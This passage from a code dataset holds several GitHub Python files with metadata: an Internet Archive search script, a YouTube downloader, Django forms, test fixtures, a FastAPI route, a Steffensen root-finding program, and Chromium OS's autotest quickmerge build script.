bar.txt\n# Dependencies: Requires the internetarchive library\n# <https://pypi.python.org/pypi/internetarchive>\n#\n#----------------------------------------------------------------------------------------\n\nimport sys\nfrom internetarchive import search_items\n\n# Search the Internet Archive for the first argument\nterm = sys.argv[1]\nprint(\"Searching IA for %s...\" % term)\nresults = search_items('collection:%s' % term)\nsys.stdout.flush()\n\n# Convert the result to a list of ids\nidentifiers = [i['identifier'] for i in 
results]\nfound = \"Found {0} identifiers.\"\nprint(found.format(len(identifiers)))\n\n# Write the list of ids to the file specified by the second argument\nwith open(sys.argv[2], 'wt') as outfile:\n writing = \"Writing to file {0} ...\"\n print(writing.format(sys.argv[2]),)\n sys.stdout.flush()\n outfile.write('\\n'.join(identifiers))\n print(\"done!\")\n", "repo_name": "drdn/dpi-rds", "sub_path": "ia-md/md-id.py", "file_name": "md-id.py", "file_ext": "py", "file_size_in_byte": 1315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "internetarchive.search_items", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "19789198714", "text": "import pytube, time\nfrom pytube.cli import on_progress\nurl = input('Enter a YouTube video link: ')\nyt = pytube.YouTube(url, on_progress_callback=on_progress)\nprint(f'The video is being downloaded | {yt.title}')\nprint(yt.thumbnail_url)\ntime.sleep(1)\nvideo=yt.streams.get_highest_resolution()\ntime.sleep(1)\nvideo.download()\ntime.sleep(1)", "repo_name": "VictorHDS/YTVD", "sub_path": "YTVD.py", "file_name": "YTVD.py", "file_ext": "py", "file_size_in_byte": 335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytube.YouTube", "line_number": 4, "usage_type": "call"}, {"api_name": "pytube.cli.on_progress", "line_number": 4, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 7, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 9, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "20599781787", "text": "from django import forms\nfrom apps.projects.models import Document, DocumentType\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass DocumentForm(forms.ModelForm):\n document_type = forms.ModelChoiceField(\n queryset=DocumentType.objects.all(),\n empty_label='Tipo',\n required=False\n )\n\n class Meta:\n model = Document\n fields = ['title', 'description', 'document_type', 'number',\n 'year', 'themes', 'owner']\n\n\nclass DocumentAdminForm(forms.ModelForm):\n file_txt = forms.FileField(label=_('File in txt format'), required=False)\n\n class Meta:\n model = Document\n fields = ['title', 'slug', 'description', 'document_type', 'number',\n 'year', 'themes', 'owner']\n", "repo_name": "labhackercd/new-wikilegis", "sub_path": "src/apps/projects/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": 
"apps.projects.models.DocumentType.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "apps.projects.models.DocumentType.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "apps.projects.models.DocumentType", "line_number": 8, "usage_type": "name"}, {"api_name": "apps.projects.models.Document", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 20, "usage_type": "call"}, {"api_name": "apps.projects.models.Document", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "27508449786", "text": "import pytest\nfrom application.app import create_app\n\n@pytest.fixture\ndef app():\n app = create_app(\"testing\")\n return app\n\n@pytest.fixture(scope=\"function\")\ndef session(app):\n with app.app_context():\n from application.database import Base, engine, db_session\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\n yield db_session", "repo_name": "SolidCake98/MLService", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "application.app.create_app", "line_number": 6, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 4, "usage_type": "attribute"}, {"api_name": "application.database.Base.metadata.drop_all", "line_number": 13, "usage_type": "call"}, {"api_name": "application.database.engine", "line_number": 13, "usage_type": "argument"}, {"api_name": "application.database.Base.metadata", "line_number": 13, "usage_type": "attribute"}, {"api_name": "application.database.Base", "line_number": 13, "usage_type": "name"}, {"api_name": "application.database.Base.metadata.create_all", "line_number": 14, "usage_type": "call"}, {"api_name": "application.database.engine", "line_number": 14, "usage_type": "argument"}, {"api_name": "application.database.Base.metadata", "line_number": 14, "usage_type": "attribute"}, {"api_name": "application.database.Base", "line_number": 14, "usage_type": "name"}, {"api_name": "application.database.db_session", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "30268965450", "text": "# -*- coding: utf-8 -*- \n\"\"\" ++++++++++++++++++++++++++++++++++++++\n@product->name PyCharm\n@project->name platform_python\n@editor->name Sanliy\n@file->name product_line.py\n@create->time 2023/5/30-9:33\n@desc->\n++++++++++++++++++++++++++++++++++++++ \"\"\"\nfrom fastapi import APIRouter\nfrom starlette.responses import HTMLResponse\n\nfrom base.c_mysql import CMysql\nfrom base.c_logger import CLogger\nfrom base.c_project import CProject\nfrom starlette.requests import Request\n\nlogger = CLogger()\ncm = CMysql()\n\nrouter = APIRouter(\n prefix=\"/product\",\n tags=[\"product\"],\n responses={404: {\"description\": \"Not Found\"}}\n)\n\ntemplates = CProject.get_template()\n\n\n@router.get(\"/lines\", response_class=HTMLResponse)\nasync def home(request: Request):\n all_nodes_msg = cm.fetchall(\n '''\n select node_id, node_zh_name, node_type from python_platform.do_nodes\n '''\n )\n 
all_nodes_dequeue = []\n for one_nodes in all_nodes_msg:\n one_nodes_msg = {}\n one_nodes_msg[\"node_id\"] = one_nodes[0]\n one_nodes_msg[\"one_node_zh_name\"] = one_nodes[1]\n one_nodes_msg[\"onde_node_type\"] = one_nodes[2]\n all_nodes_dequeue.append(one_nodes_msg)\n return templates.TemplateResponse(\"product_lines.html\", {\"request\": request, \"all_nodes_msg\": all_nodes_dequeue})\n", "repo_name": "sanliyang/platform_python", "sub_path": "platform_python/front_desk/product/product_line.py", "file_name": "product_line.py", "file_ext": "py", "file_size_in_byte": 1301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "base.c_logger.CLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "base.c_mysql.CMysql", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 21, "usage_type": "call"}, {"api_name": "base.c_project.CProject.get_template", "line_number": 27, "usage_type": "call"}, {"api_name": "base.c_project.CProject", "line_number": 27, "usage_type": "name"}, {"api_name": "starlette.requests.Request", "line_number": 31, "usage_type": "name"}, {"api_name": "starlette.responses.HTMLResponse", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "15361687537", "text": "from sympy import *\nfrom tabulate import tabulate\n\na = 0\nb = 0\nerror = 0\n\nx = Symbol(\"x\")\nf=\"\"\nfx = str(f)\nf = lambda x: eval(fx)\n\n# Metodo de Steffensen\ndef Steffensen(a, b, error):\n tabla = []\n ep = 0\n i=1\n #Calcular x0\n x0 = (a+b)/2\n xn=x0\n\n while (ep >= error or ep == 0):\n #p1 = f(x_n)\n p1 = f(xn)\n\n #p2 = f(x_n)\n p2 = f(xn+p1)\n try:\n #p = x_n+1 = xn - (f(x)^2/(f(xn + f(xn))-f(xn))\n p = xn - (pow(p1,2)/(p2 - p1)) \n except ZeroDivisionError:\n break\n ep = abs((p-xn)/p)*100\n tabla.append([i, xn, p1, p2, p, ep])\n xn = p\n i+=1 \n return(tabla)\n\n\n# Menú\ncontinuar = True\nwhile continuar:\n try:\n print(\"\"\"\n\n Proyecto 3 - Métodos de Steffensen\n [1]Presentación\n [2]Método de Steffensen\n \"\"\")\n opt = int(input(\"Seleccione una opción: \"))\n\n if(opt < 1 or opt > 2):\n print(\"opcion equivocada, favor validar\")\n else:\n\n if opt>1:\n fx = input(\"Ingrese la funcion: \")\n print(\"Ingrese el intervalo a evaluar:\")\n a = float(input(\"a: \"))\n b = float(input(\"b: \"))\n\n assert a<b\n assert f(a)*f(b)<0\n\n error = float(input(\"error: \"))\n if opt == 1:\n print(\"\"\"\n Desarrollado por:\n Cortez, Brandool\n Estribí, Fernando\n\n Grupo: 1SF131\"\"\")\n elif opt == 2:\n tabla = Steffensen(a, b, error)\n ntabla = len(tabla)\n\n # Salida del metodo de Steffensen\n header = ['i', 'xn', 'f(xn)', 'f(xn + f(xn))', 'xn+1', 'ep']\n print(tabulate(tabla, headers=header, floatfmt=\".4f\"))\n\n print('raiz: ', \"{:.4f}\".format(tabla[len(tabla)-1][4]))\n print('error: ', \"{:.4f}\".format(tabla[ len(tabla)-1][5]))\n \n except ValueError:\n print(\"Dato ingresado no numérico. Intente de nuevo.\")\n except AssertionError:\n print(\"\"\"Se deben cumplir las siguientes condiciones:\n a<b \n f(a)*f(b)<0\n Intente de nuevo.\"\"\")\n\n answer = None\n while answer not in (\"y\", \"n\"):\n answer = input(\"¿Desea realizar otro procedimiento? [y/n]: \")\n if answer == \"y\":\n pass\n elif answer == \"n\":\n continuar = False\n else:\n print(\"Opcion invalida. 
Intente de nuevo.\")", "repo_name": "fernandojose21/PY3-SteffensenMethod", "sub_path": "Steffensen.py", "file_name": "Steffensen.py", "file_ext": "py", "file_size_in_byte": 2605, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tabulate.tabulate", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "12537846585", "text": "from __future__ import print_function\n\nimport argparse\nimport glob\nimport os\nimport re\nimport sys\nfrom collections import namedtuple\n\nfrom chromite.lib import constants\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_logging as logging\nfrom chromite.lib import git\nfrom chromite.lib import osutils\nfrom chromite.lib import portage_util\n\nif cros_build_lib.IsInsideChroot():\n # Only import portage after we've checked that we're inside the chroot.\n import portage\n\n\nINCLUDE_PATTERNS_FILENAME = 'autotest-quickmerge-includepatterns'\nAUTOTEST_PROJECT_NAME = 'chromiumos/third_party/autotest'\nAUTOTEST_EBUILD = 'chromeos-base/autotest'\nDOWNGRADE_EBUILDS = ['chromeos-base/autotest']\n\nIGNORE_SUBDIRS = ['ExternalSource',\n 'logs',\n 'results',\n 'site-packages']\n\n# Data structure describing a single rsync filesystem change.\n#\n# change_description: An 11 character string, the rsync change description\n# for the particular file.\n# absolute_path: The absolute path of the created or modified file.\nItemizedChange = namedtuple('ItemizedChange', ['change_description',\n 'absolute_path'])\n\n# Data structure describing the rsync new/modified files or directories.\n#\n# new_files: A list of ItemizedChange objects for new files.\n# modified_files: A list of ItemizedChange objects for modified files.\n# new_directories: A list of ItemizedChange objects for new directories.\nItemizedChangeReport = namedtuple('ItemizedChangeReport',\n ['new_files', 'modified_files',\n 'new_directories'])\n\n\nclass PortagePackageAPIError(Exception):\n \"\"\"Exception thrown when unable to retrieve a portage package API.\"\"\"\n\n\ndef GetStalePackageNames(change_list, autotest_sysroot):\n \"\"\"Given a rsync change report, returns the names of stale test packages.\n\n This function pulls out test package names for client-side tests, stored\n within the client/site_tests directory tree, that had any files added or\n modified and for whom any existing bzipped test packages may now be stale.\n\n Args:\n change_list: A list of ItemizedChange objects corresponding to changed\n or modified files.\n autotest_sysroot: Absolute path of autotest in the sysroot,\n e.g. '/build/lumpy/usr/local/build/autotest'\n\n Returns:\n A list of test package names, eg ['factory_Leds', 'login_UserPolicyKeys'].\n May contain duplicate entries if multiple files within a test directory\n were modified.\n \"\"\"\n exp = os.path.abspath(autotest_sysroot) + r'/client/site_tests/(.*?)/.*'\n matches = [re.match(exp, change.absolute_path) for change in change_list]\n return [match.group(1) for match in matches if match]\n\n\ndef ItemizeChangesFromRsyncOutput(rsync_output, destination_path):\n \"\"\"Convert the output of an rsync with `-i` to a ItemizedChangeReport object.\n\n Args:\n rsync_output: String stdout of rsync command that was run with `-i` option.\n destination_path: String absolute path of the destination directory for the\n rsync operations. 
This argument is necessary because\n rsync's output only gives the relative path of\n touched/added files.\n\n Returns:\n ItemizedChangeReport object giving the absolute paths of files that were\n created or modified by rsync.\n \"\"\"\n modified_matches = re.findall(r'([.>]f[^+]{9}) (.*)', rsync_output)\n new_matches = re.findall(r'(>f\\+{9}) (.*)', rsync_output)\n new_symlink_matches = re.findall(r'(cL\\+{9}) (.*) -> .*', rsync_output)\n new_dir_matches = re.findall(r'(cd\\+{9}) (.*)', rsync_output)\n\n absolute_modified = [ItemizedChange(c, os.path.join(destination_path, f))\n for (c, f) in modified_matches]\n\n # Note: new symlinks are treated as new files.\n absolute_new = [ItemizedChange(c, os.path.join(destination_path, f))\n for (c, f) in new_matches + new_symlink_matches]\n\n absolute_new_dir = [ItemizedChange(c, os.path.join(destination_path, f))\n for (c, f) in new_dir_matches]\n\n return ItemizedChangeReport(new_files=absolute_new,\n modified_files=absolute_modified,\n new_directories=absolute_new_dir)\n\n\ndef GetPackageAPI(portage_root, package_cp):\n \"\"\"Gets portage API handles for the given package.\n\n Args:\n portage_root: Root directory of portage tree. Eg '/' or '/build/lumpy'\n package_cp: A string similar to 'chromeos-base/autotest-tests'.\n\n Returns:\n Returns (package, vartree) tuple, where\n package is of type portage.dbapi.vartree.dblink\n vartree is of type portage.dbapi.vartree.vartree\n \"\"\"\n if portage_root is None:\n # pylint: disable=no-member\n portage_root = portage.root\n # Ensure that portage_root ends with trailing slash.\n portage_root = os.path.join(portage_root, '')\n\n # Create a vartree object corresponding to portage_root.\n trees = portage.create_trees(portage_root, portage_root)\n vartree = trees[portage_root]['vartree']\n\n # List the matching installed packages in cpv format.\n matching_packages = vartree.dbapi.cp_list(package_cp)\n\n if not matching_packages:\n raise PortagePackageAPIError('No matching package for %s in portage_root '\n '%s' % (package_cp, portage_root))\n\n if len(matching_packages) > 1:\n raise PortagePackageAPIError('Too many matching packages for %s in '\n 'portage_root %s' % (package_cp,\n portage_root))\n\n # Convert string match to package dblink.\n package_cpv = matching_packages[0]\n package_split = portage_util.SplitCPV(package_cpv)\n # pylint: disable=no-member\n package = portage.dblink(package_split.category,\n package_split.pv, settings=vartree.settings,\n vartree=vartree)\n\n return package, vartree\n\n\ndef DowngradePackageVersion(portage_root, package_cp,\n downgrade_to_version='0'):\n \"\"\"Downgrade the specified portage package version.\n\n Args:\n portage_root: Root directory of portage tree. Eg '/' or '/build/lumpy'\n package_cp: A string similar to 'chromeos-base/autotest-tests'.\n downgrade_to_version: String version to downgrade to. Default: '0'\n\n Returns:\n True on success. 
False on failure (nonzero return code from `mv` command).\n  \"\"\"\n  try:\n    package, _ = GetPackageAPI(portage_root, package_cp)\n  except PortagePackageAPIError:\n    # Unable to fetch a corresponding portage package API for this\n    # package_cp (either no such package, or the name is ambiguous and\n    # matches multiple packages).  So, just fail out.\n    return False\n\n  source_directory = package.dbdir\n  destination_path = os.path.join(\n      package.dbroot, package_cp + '-' + downgrade_to_version)\n  if os.path.abspath(source_directory) == os.path.abspath(destination_path):\n    return True\n  command = ['mv', source_directory, destination_path]\n  code = cros_build_lib.SudoRunCommand(command, error_code_ok=True).returncode\n  return code == 0\n\n\ndef UpdatePackageContents(change_report, package_cp, portage_root=None):\n  \"\"\"Add newly created files/directories to package contents.\n\n  Given an ItemizedChangeReport, add the newly created files and directories\n  to the CONTENTS of an installed portage package, such that these files are\n  considered owned by that package.\n\n  Args:\n    change_report: ItemizedChangeReport object for the changes to be\n                   made to the package.\n    package_cp: A string similar to 'chromeos-base/autotest-tests' giving\n                the package category and name of the package to be altered.\n    portage_root: Portage root path, corresponding to the board that\n                  we are working on. Defaults to '/'\n  \"\"\"\n  package, vartree = GetPackageAPI(portage_root, package_cp)\n\n  # Append new contents to package contents dictionary.\n  contents = package.getcontents().copy()\n  for _, filename in change_report.new_files:\n    contents.setdefault(filename, (u'obj', '0', '0'))\n  for _, dirname in change_report.new_directories:\n    # Strip trailing slashes if present.\n    contents.setdefault(dirname.rstrip('/'), (u'dir',))\n\n  # Write new contents dictionary to file.\n  vartree.dbapi.writeContentsToContentsFile(package, contents)\n\n\ndef RemoveBzipPackages(autotest_sysroot):\n  \"\"\"Remove all bzipped test/dep/profiler packages from sysroot autotest.\n\n  Args:\n    autotest_sysroot: Absolute path of autotest in the sysroot,\n                      e.g. '/build/lumpy/usr/local/build/autotest'\n  \"\"\"\n  osutils.RmDir(os.path.join(autotest_sysroot, 'packages'),\n                ignore_missing=True)\n  osutils.SafeUnlink(os.path.join(autotest_sysroot, 'packages.checksum'))\n\n\ndef RsyncQuickmerge(source_path, sysroot_autotest_path,\n                    include_pattern_file=None, pretend=False,\n                    overwrite=False):\n  \"\"\"Run rsync quickmerge command, with specified arguments.\n\n  Command will take form `rsync -a [options] --exclude=**.pyc\n                         --exclude=**.pyo\n                         [optional --include-from include_pattern_file]\n                         --exclude=* [source_path] [sysroot_autotest_path]`\n\n  Args:\n    source_path: Directory to rsync from.\n    sysroot_autotest_path: Directory to rsync to.\n    include_pattern_file: Optional pattern of files to include in rsync.\n    pretend: True to use the '-n' option to rsync, to perform a dry run.\n    overwrite: True to omit '-u' option, overwrite all files in sysroot,\n               not just older files.\n\n  Returns:\n    The cros_build_lib.CommandResult object resulting from the rsync command.\n  \"\"\"\n  command = ['rsync', '-a']\n\n  # For existing files, preserve destination permissions. This ensures that\n  # existing files end up with the file permissions set by the ebuilds.\n  # If this script copies over a file that does not exist in the destination\n  # tree, it will set the least restrictive permissions allowed in the\n  # destination tree. 
This could happen if the file copied is not installed by\n # *any* ebuild, or if the ebuild that installs the file was never emerged.\n command += ['--no-p', '--chmod=ugo=rwX']\n\n if pretend:\n command += ['-n']\n\n if not overwrite:\n command += ['-u']\n\n command += ['-i']\n\n command += ['--exclude=**.pyc']\n command += ['--exclude=**.pyo']\n\n # Exclude files with a specific substring in their name, because\n # they create an ambiguous itemized report. (see unit test file for details)\n command += ['--exclude=** -> *']\n\n if include_pattern_file:\n command += ['--include-from=%s' % include_pattern_file]\n\n command += ['--exclude=*']\n\n # Some tests use symlinks. Follow these.\n command += ['-L']\n\n command += [source_path, sysroot_autotest_path]\n\n return cros_build_lib.SudoRunCommand(command, redirect_stdout=True)\n\n\ndef ParseArguments(argv):\n \"\"\"Parse command line arguments\n\n Returns:\n parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description='Perform a fast approximation '\n 'to emerge-$board autotest-all, by '\n 'rsyncing source tree to sysroot.')\n\n default_board = cros_build_lib.GetDefaultBoard()\n parser.add_argument('--board', metavar='BOARD', default=default_board,\n help='Board to perform quickmerge for. Default: ' +\n (default_board or 'Not configured.'))\n parser.add_argument('--pretend', action='store_true',\n help='Dry run only, do not modify sysroot autotest.')\n parser.add_argument('--overwrite', action='store_true',\n help='Overwrite existing files even if newer.')\n parser.add_argument('--force', action='store_true',\n help=argparse.SUPPRESS)\n parser.add_argument('--verbose', action='store_true',\n help='Print detailed change report.')\n\n # Used only if test_that is calling autotest_quickmerge and has detected that\n # the sysroot autotest path is still in usr/local/autotest (ie the build\n # pre-dates https://chromium-review.googlesource.com/#/c/62880/ )\n parser.add_argument('--legacy_path', action='store_true',\n help=argparse.SUPPRESS)\n\n return parser.parse_args(argv)\n\n\ndef main(argv):\n cros_build_lib.AssertInsideChroot()\n\n args = ParseArguments(argv)\n\n if os.geteuid() != 0:\n try:\n cros_build_lib.SudoRunCommand([sys.executable] + sys.argv)\n except cros_build_lib.RunCommandError:\n return 1\n return 0\n\n if not args.board:\n print('No board specified. 
Aborting.')\n return 1\n\n manifest = git.ManifestCheckout.Cached(constants.SOURCE_ROOT)\n checkout = manifest.FindCheckout(AUTOTEST_PROJECT_NAME)\n brillo_autotest_src_path = os.path.join(checkout.GetPath(absolute=True), '')\n\n script_path = os.path.dirname(__file__)\n include_pattern_file = os.path.join(script_path, INCLUDE_PATTERNS_FILENAME)\n\n # TODO: Determine the following string programatically.\n sysroot_path = os.path.join('/build', args.board, '')\n sysroot_autotest_path = os.path.join(sysroot_path,\n constants.AUTOTEST_BUILD_PATH, '')\n if args.legacy_path:\n sysroot_autotest_path = os.path.join(sysroot_path, 'usr/local/autotest',\n '')\n\n # Generate the list of source paths to copy.\n src_paths = {os.path.abspath(brillo_autotest_src_path)}\n for quickmerge_file in glob.glob(os.path.join(sysroot_autotest_path,\n 'quickmerge', '*', '*')):\n try:\n path = osutils.ReadFile(quickmerge_file).strip()\n if path and os.path.exists(path):\n src_paths.add(os.path.abspath(path))\n except IOError:\n logging.error('Could not quickmerge for project: %s',\n os.path.basename(quickmerge_file))\n\n num_new_files = 0\n num_modified_files = 0\n for src_path in src_paths:\n rsync_output = RsyncQuickmerge(src_path +'/', sysroot_autotest_path,\n include_pattern_file, args.pretend,\n args.overwrite)\n\n if args.verbose:\n logging.info(rsync_output.output)\n change_report = ItemizeChangesFromRsyncOutput(rsync_output.output,\n sysroot_autotest_path)\n num_new_files = num_new_files + len(change_report.new_files)\n num_modified_files = num_modified_files + len(change_report.modified_files)\n if not args.pretend:\n logging.info('Updating portage database.')\n UpdatePackageContents(change_report, AUTOTEST_EBUILD, sysroot_path)\n\n if not args.pretend:\n for logfile in glob.glob(os.path.join(sysroot_autotest_path, 'packages',\n '*.log')):\n try:\n # Open file in a try-except block, for atomicity, instead of\n # doing existence check.\n with open(logfile, 'r') as f:\n package_cp = f.readline().strip()\n DOWNGRADE_EBUILDS.append(package_cp)\n except IOError:\n pass\n\n for ebuild in DOWNGRADE_EBUILDS:\n if not DowngradePackageVersion(sysroot_path, ebuild):\n logging.warning('Unable to downgrade package %s version number.',\n ebuild)\n RemoveBzipPackages(sysroot_autotest_path)\n\n sentinel_filename = os.path.join(sysroot_autotest_path,\n '.quickmerge_sentinel')\n cros_build_lib.RunCommand(['touch', sentinel_filename])\n\n if args.pretend:\n logging.info('The following message is pretend only. No filesystem '\n 'changes made.')\n logging.info('Quickmerge complete. 
Created or modified %s files.',\n num_new_files + num_modified_files)\n\n return 0\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/chromite/scripts/autotest_quickmerge.py", "file_name": "autotest_quickmerge.py", "file_ext": "py", "file_size_in_byte": 15824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "chromite.lib.cros_build_lib.IsInsideChroot", "line_number": 17, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 17, "usage_type": "name"}, {"api_name": "collections.namedtuple", "line_number": 37, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 73, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 91, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 92, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 93, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "portage.root", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "portage.create_trees", "line_number": 130, "usage_type": "call"}, {"api_name": "chromite.lib.portage_util.SplitCPV", "line_number": 147, "usage_type": "call"}, {"api_name": "chromite.lib.portage_util", "line_number": 147, "usage_type": "name"}, {"api_name": "portage.dblink", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.SudoRunCommand", "line_number": 182, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 182, "usage_type": "name"}, {"api_name": "chromite.lib.osutils.RmDir", "line_number": 222, "usage_type": "call"}, {"api_name": "chromite.lib.osutils", "line_number": 222, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "chromite.lib.osutils.SafeUnlink", "line_number": 224, "usage_type": "call"}, {"api_name": "chromite.lib.osutils", "line_number": 224, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.SudoRunCommand", "line_number": 283, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 283, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", 
"line_number": 292, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib.GetDefaultBoard", "line_number": 296, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 296, "usage_type": "name"}, {"api_name": "argparse.SUPPRESS", "line_number": 305, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 313, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.AssertInsideChroot", "line_number": 319, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 319, "usage_type": "name"}, {"api_name": "os.geteuid", "line_number": 323, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib.SudoRunCommand", "line_number": 325, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 325, "usage_type": "name"}, {"api_name": "sys.executable", "line_number": 325, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 325, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.RunCommandError", "line_number": 326, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 326, "usage_type": "name"}, {"api_name": "chromite.lib.git.ManifestCheckout.Cached", "line_number": 334, "usage_type": "call"}, {"api_name": "chromite.lib.git.ManifestCheckout", "line_number": 334, "usage_type": "attribute"}, {"api_name": "chromite.lib.git", "line_number": 334, "usage_type": "name"}, {"api_name": "chromite.lib.constants.SOURCE_ROOT", "line_number": 334, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 334, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path", "line_number": 338, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 342, "usage_type": "call"}, {"api_name": "os.path", "line_number": 342, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 343, "usage_type": "call"}, {"api_name": "os.path", "line_number": 343, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants.AUTOTEST_BUILD_PATH", "line_number": 344, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 344, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path", "line_number": 346, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 350, "usage_type": "call"}, {"api_name": "os.path", "line_number": 350, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "chromite.lib.osutils.ReadFile", "line_number": 354, "usage_type": "call"}, {"api_name": "chromite.lib.osutils", "line_number": 354, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 355, "usage_type": "call"}, {"api_name": "os.path", "line_number": 355, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 356, "usage_type": "call"}, {"api_name": "os.path", "line_number": 356, "usage_type": "attribute"}, {"api_name": 
